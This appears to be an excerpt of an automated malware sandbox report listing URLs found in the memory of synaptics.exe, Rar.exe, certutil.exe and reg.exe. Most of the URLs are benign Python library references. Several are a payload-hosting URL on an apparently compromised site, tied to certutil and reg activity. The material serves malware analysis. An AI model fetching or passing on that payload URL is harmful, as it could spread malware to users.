Source: synaptics.exe, 0000000E.00000003.1583695126.0000000001698000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1583868672.0000000001589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.html
Source: synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234#appendix-B.1
Source: synaptics.exe, 0000000E.00000003.1755199297.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1775753287.0000000001B12000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1740211106.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1749238715.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2085454044.0000000003700000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1792569664.0000000001B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc7230#section-3.2)
Source: synaptics.exe, 0000000E.00000003.1683425743.00000000015DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/
Source: synaptics.exe, 0000000E.00000003.2006146636.0000000001699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.000000000169E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1963146228.000000000169E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: synaptics.exe, 0000000E.00000003.1981058371.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
Source: synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1982039478.0000000001789000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: synaptics.exe, 0000000E.00000003.1936275279.0000000001782000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/_
Source: synaptics.exe, 0000000E.00000003.1615880781.0000000001673000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1625000683.0000000001672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: synaptics.exe, 0000000E.00000003.1568979332.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.demo2s.com/Tutorial/Cpp/0380__set-multiset/Catalog0380__set-multiset.htm
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB2EB000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 0000000D.00000003.1515627725.00000267FAF4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: synaptics.exe, 0000000E.00000003.1568979332.0000000001505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/software/smalltalk/manual-base/html_node/Bag.html
Source: synaptics.exe, 0000000E.00000003.1820282468.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1903683751.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1870679591.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1792569664.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1749238715.0000000001B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1661251659.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1775753287.0000000001B18000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884934095.0000000001B1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameteE
Source: synaptics.exe, 0000000E.00000003.1648976556.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1872057233.000000000161E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1690514638.000000000161D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2026265739.00000000004AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1647749038.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2016900266.00000000004A6000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1996242373.00000000004A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2041050261.00000000004AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1679320741.000000000161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: synaptics.exe, 0000000E.00000003.1625000683.0000000001672000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1628618892.000000000152F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: synaptics.exe, 0000000E.00000003.1615880781.0000000001673000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1625000683.0000000001672000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: synaptics.exe, 0000000E.00000003.1705608344.00000000015D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pkware.com/documents/casestudies/APPNOTE.TXT
Source: synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: synaptics.exe, 0000000E.00000003.1989810343.0000000001635000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1923500924.0000000001634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps8?
Source: synaptics.exe, 0000000E.00000003.1837071396.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001ADA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1774756889.000000000150C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1771128213.00000000019E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
Source: synaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue20164
Source: synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue29585
Source: synaptics.exe, 0000000E.00000003.1683425743.00000000015DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue39682
Source: synaptics.exe, 0000000E.00000003.1615880781.0000000001673000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/msg352381
Source: synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3129
Source: synaptics.exe, 0000000E.00000003.1653243897.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: synaptics.exe, 0000000E.00000003.1754288177.000000000150C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1759720102.000000000150F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/openssl/openssl/issues/14579
Source: synaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/1846
Source: synaptics.exe, 0000000E.00000003.1901087710.00000000019E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/issues/3578.
Source: synaptics.exe, 0000000E.00000003.1901087710.00000000019E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/2238
Source: synaptics.exe, 0000000E.00000003.2026431040.0000000004120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
Source: synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/pyopenssl/pull/933
Source: synaptics.exe, 0000000E.00000002.2047461649.0000000000F30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
Source: synaptics.exe, 0000000E.00000003.1797188977.0000000001A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/pull/7160#di
Source: synaptics.exe, 0000000E.00000003.1653243897.00000000015D1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: synaptics.exe, 0000000E.00000003.1837071396.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1755199297.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1942878468.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1881745722.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1750547795.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1895983675.0000000001AEE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: synaptics.exe, 0000000E.00000002.2085454044.0000000003700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: synaptics.exe, 0000000E.00000003.1550025293.00000000004AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3020)
Source: synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3267.
Source: synaptics.exe, 0000000E.00000003.1873668796.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1752088361.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1772116767.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1684122581.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1841323877.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1737724453.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2085454044.0000000003700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: synaptics.exe, 0000000E.00000003.1653243897.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/pull/3024
Source: synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: synaptics.exe, 0000000E.00000003.1867809289.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1879641191.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1872057233.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1888699521.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.0000000001637000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1923500924.0000000001641000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
Source: synaptics.exe, 0000000E.00000003.1679320741.000000000161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
Source: synaptics.exe, 0000000E.00000003.2005085919.000000000162C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.000000000162D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666279981.000000000162B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1824970526.0000000001628000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1966363766.000000000162D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1661362140.000000000162B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1690514638.000000000162A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1675448083.000000000162D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
Source: synaptics.exe, 0000000E.00000002.2074356493.0000000001DD0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2059820653.000000000168F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1927224183.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: synaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1576834814.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2022069345.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1557643124.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
Source: synaptics.exe, 0000000E.00000003.1675448083.000000000162D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1993299353.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: synaptics.exe, 0000000E.00000003.1873668796.0000000001683000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1885600236.0000000001CAD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1868762466.0000000001CAD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2025413905.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1893181022.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974413565.0000000001682000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1820282468.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1841323877.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: synaptics.exe, 0000000E.00000003.1707543519.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1680210138.000000000171A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1740211106.0000000001AFE000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1713056984.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2067676668.0000000001990000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1671882063.0000000001B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1709484783.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1673166883.0000000001676000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2081614372.0000000001EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: Rar.exe, 0000000D.00000003.1515627725.00000267FB27B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
Source: synaptics.exe, 0000000E.00000003.2026431040.0000000004120000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1557643124.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: synaptics.exe, 0000000E.00000003.1891166780.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2000272163.00000000014DA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1904323293.00000000014DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.ioz
Source: synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2035849609.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1752088361.000000000166B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1854439009.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2008068232.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1902935906.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1965642029.000000000166D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2057996598.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1737724453.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1875857822.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1669337534.000000000166E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1993299353.000000000166E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#appendix-A
Source: synaptics.exe, 0000000E.00000003.1604109987.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc3986#section-3.3
Source: synaptics.exe, 0000000E.00000003.1824970526.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1989810343.0000000001637000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2003475235.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2011600691.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1985740272.0000000001D31000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1998569141.000000000163F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1961070644.0000000001D30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1707543519.0000000001AF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html
Source: synaptics.exe, 0000000E.00000002.2081614372.0000000001EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: synaptics.exe, 0000000E.00000003.1752088361.000000000165D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyz
Source: synaptics.exe, 0000000E.00000002.2083900746.0000000001EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: synaptics.exe, 0000000E.00000003.1665090261.0000000001661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN)
Source: synaptics.exe, 0000000E.00000002.2054927261.0000000001040000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuy
Source: certutil.exe, 0000000F.00000002.1533205097.0000027FF26D0000.00000004.00000020.00020000.00000000.sdmp, reg.exe, 00000010.00000002.1535137113.00000255D9BD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL
Source: synaptics.exe, 0000000E.00000002.2098925843.00000000038E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/tuyen/tuyen_all
Source: synaptics.exe, 0000000E.00000003.1872057233.00000000015E1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1884206824.0000000001A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ietf.org/rfc/rfc4627.txt
Source: synaptics.exe, 0000000E.00000003.2000623728.0000000000489000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1576834814.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2022069345.000000000048A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1557643124.000000000048A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: synaptics.exe, 0000000E.00000003.1873668796.0000000001683000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2025413905.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1893181022.0000000001684000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1974413565.0000000001682000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1820282468.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1841323877.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: synaptics.exe, 0000000E.00000003.1582017768.000000000150C000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1582017768.00000000014E0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1586779864.0000000001504000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1579723171.0000000000499000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1581103865.000000000049A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1581103865.00000000004B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: synaptics.exe, 0000000E.00000003.1566011957.000000000047D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: synaptics.exe, 0000000E.00000002.2051315793.0000000000FB0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/
Source: synaptics.exe, 0000000E.00000003.1537720925.0000000000497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/psf/license/)
Source: synaptics.exe, 0000000E.00000003.1837071396.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1671882063.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1680210138.000000000171A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1740211106.0000000001AED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1797188977.0000000001AEC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1666692376.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1750547795.0000000001AE8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: synaptics.exe, 0000000E.00000003.2031635787.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1964387506.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000002.2070826986.0000000001B1B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.1930250320.0000000001B19000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000E.00000003.2024048436.0000000001B1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
